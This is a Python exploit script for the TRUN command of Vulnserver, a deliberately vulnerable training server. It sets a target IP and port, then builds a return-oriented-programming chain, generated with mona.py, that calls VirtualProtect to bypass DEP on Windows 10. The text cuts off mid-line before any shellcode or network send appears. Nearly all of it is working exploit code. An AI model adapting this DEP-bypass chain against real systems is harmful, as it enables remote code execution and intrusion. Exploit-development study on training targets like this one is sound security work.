#!/usr/bin/env python3 """ Vulnserver TRUN exploit (ROP, DEP bypass). Vulnerable Software: Vulnserver Version: 1.00 Exploit Author: Andres Roldan Tested On: Windows 10 20H2 Writeup: https://fluidattacks.com/blog/vulnserver-trun-rop/ """ import socket import struct HOST = "192.168.0.20" PORT = 9999 def create_rop_chain(): """Return ROP chain generated with mona.py - www.corelan.be.""" rop_gadgets = [ # [---INFO:gadgets_to_set_esi:---] 0x75AF7361, # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 0x6250609C, # ptr to &VirtualProtect() [IAT essfunc.dll] 0x759DDE46, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll] 0x75D61470, # XCHG EAX,ESI # RETN [WS2_32.DLL] ** REBASED ** ASLR # [---INFO:gadgets_to_set_ebp:---] 0x76F0615A, # POP EBP # RETN [ntdll.dll] ** REBASED ** ASLR 0x625011C7, # & jmp esp [essfunc.dll] # [---INFO:gadgets_to_set_ebx:---] 0x75A203AD, # POP EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 0xFFFFFDFF, # Value to negate, will become 0x00000201 0x76F14E39, # NEG EAX # RETN [ntdll.dll] ** REBASED ** ASLR 0x75A77926, # XCHG EAX,EBX # RETN [msvcrt.dll] ** REBASED ** ASLR # [---INFO:gadgets_to_set_edx:---] 0x75AF6AF7, # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 0xFFFFFFC0, # Value to negate, will become 0x00000040 0x756A87DA, # NEG EAX # RETN [KERNEL32.DLL] ** REBASED ** ASLR 0x75D2C549, # XCHG EAX,EDX # RETN [WS2_32.DLL] ** REBASED ** ASLR # [---INFO:gadgets_to_set_ecx:---] 0x767173F8, # POP ECX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 0x75A4A3AC, # &Writable location [RPCRT4.dll] ** REBASED ** ASLR # [---INFO:gadgets_to_set_edi:---] 0x75AE9998, # POP EDI # RETN [msvcrt.dll] ** REBASED ** ASLR 0x756A9C0A, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR # [---INFO:gadgets_to_set_eax:---] 0x75A43571, # POP EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 0x90909090, # nop # [---INFO:pushad:---] 0x76EA9599, # PUSHAD # RETN [ntdll.dll] ** REBASED ** ASLR ] return b"".join(struct.pack("